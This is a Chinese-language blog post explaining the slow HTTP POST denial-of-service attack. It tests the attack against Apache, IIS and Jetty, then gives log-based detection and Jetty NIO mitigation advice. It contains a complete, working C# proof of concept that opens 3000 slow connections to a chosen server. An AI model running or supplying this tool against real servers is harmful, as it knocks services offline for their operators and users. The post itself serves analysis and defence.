HTTP POST慢速DOS攻击初探

1. 关于HTTP POST慢速DOS攻击

HTTP Post慢速DOS攻击第一次在技术社区被正式披露是今年的OWASP大会上，由Wong Onn Chee 和 Tom Brennan共同演示了使用这一技术攻击的威力。他们的slides在这里：

http://www.darkreading.com/galleries/security/application-security/228400167/slide-show-ddos-with-the-slow-http-post-attack.html

这个攻击的基本原理如下：

针对任意HTTP Server，建立一个连接，指定一个比较大的content-length，然后以很低的速度发包，比如10-100s发一个字节，hold住这个连接不断开。如果客户端持续建立这样的连接，那么服务器上可用的连接将很快被占满，从而导致DOS.

这一攻击引起我注意的原因有这几点：

1. 它可以针对任意Web服务。HTTP协议在接收到request之前是无法对请求内容作校验的，所以即使你的Web应用没有可用form表单，这个攻击一样有效。

2. 廉价。在客户端以单线程方式建立较大数量的无用连接，并保持持续发包的代价非常低廉。实际试验中一台普通PC可以建立的Socket连接在3000个以上。这对一台普通的web server，将是致命的打击。更不用说结合肉鸡群做分布式DOS了。

2. 攻击示范

为演示这个攻击，我做了一个简单的POC，C#代码如下。

using System;
using System.Collections.Generic;
using System.Text;
using System.Net.Sockets;
using System.Threading;

namespace HTTPPostDoS
{
    class TestDemo
    {
        static void Main(string[] args)
        {
            string host = "target";
            int port = 8080;
            int max_number_of_connection = 3000;
            List<TcpClient> clients = new List<TcpClient>();

            for (int i = 0; i < max_number_of_connection; i++)
            {
                TcpClient client = new TcpClient();
                clients.Add(client);
                client.Connect(host, port);

                if (client.Connected)
                {
                    string header = "POST /a HTTP/1.1\r\n" +
                                    "HOST: " + host + "\r\n" +
                                    "Connection: keep-alive\r\n" +
                                    "Keep-Alive: 900\r\n" +
                                    "Content-Length: 100000000\r\n" +
                                    "Content_Type: application/x-www-form-urlencoded\r\n" +
                                    "Accept: *.*\r\n";
                    int sent = client.Client.Send(System.Text.Encoding.Default.GetBytes(header));
                    if (sent <= 0)
                    {
                        Console.WriteLine("Error while connecting to server");
                    }
                    else
                    {
                        Console.WriteLine("Connected");
                    }
                }
            }

            while (true)
            {
                int i = 0;
                foreach (TcpClient client in clients)
                {
                    i++;
                    client.Client.Send(System.Text.Encoding.Default.GetBytes("a"));
                    Console.WriteLine("Client " + i + " just sent a byte.");
                }
                Thread.Sleep(1000);
            }
        }
    }
}

这段代码向目标服务器的示例Web Server发起攻击，每秒钟向服务器post一个字节以保证连接不会过期。

这个攻击对Apache的效果十分明显，Apache的maxClients几乎在瞬间被hold住，浏览器在攻击进行期间无法访问测试页面。

但是针对IIS的攻击被证明没有效果，同时我还测试了公司使用最多的Jetty，有了更多有意思的发现。

3. Jetty Server 在NIO和BIO模式下对此攻击的不同反应

在针对Jetty做测试时，我发现针对不同的Jetty Connector配置，攻击的效果有天壤之别。

我们知道Jetty在配置Connector时，可以有NIO和BIO两种模式供选择。当使用BIO模式时，Jetty的max thread被瞬间耗尽，服务停止。但是在使用NIO模式时，即使客户端的恶意socket连接数已经达到3000个，但是服务依然没有受到任何影响。这个应该很好理解，由于这两种模式下的Connector直接影响到服务端处理Socket的模型。IIS的情况我不是很清楚，但是猜测MS在实现时采用了NIO Socket模型。

详细的配置情况，请参见Jetty的官方文档。

其它的Web Server，我没有做进一步测试。如有兴趣请自行验证。

4. 检测与防范

目前针对Apache服务器，官方尚没有解决方案出台。建议：

1. 检查日志，查找类似的错误报警：

[error] server reached MaxClients setting, consider raising the MaxClients setting

看看有没有被这种攻击盯上。

2. 调整防火墙设置。有条件的，在IPS上做一下规则设置。

注意这些都还只是暂时措施，因为这种攻击的变化可能很多，事实上使用HTTP GET也可以达到一样的效果。要知道GET也是可以传输数据的。

针对Jetty服务器，强烈建议使用NIO非阻塞模式，对服务器可以起到很好的保护作用。

相关阅读：

1. New HTTP POST DDoS Attack Tools Released

2. Wong Onn Chee 和Tom Brennan的Paper

3. Using HTTP POST for denial of service

 

补充1：我的同事，Active安全经理Eric Zhong和应用安全工程师Vian Ma对此文有贡献，谨此致谢

补充2：凤凰网的孙立先生指出，微软的IIS实现了完成端口(IOCP)，IO效率相当高。这解释了为何此攻击对IIS无效。

原文地址：http://www.unclejoey.com/2010/12/28/http-post%E6%85%A2%E9%80%9Fdos%E6%94%BB%E5%87%BB%E5%88%9D%E6%8E%A2/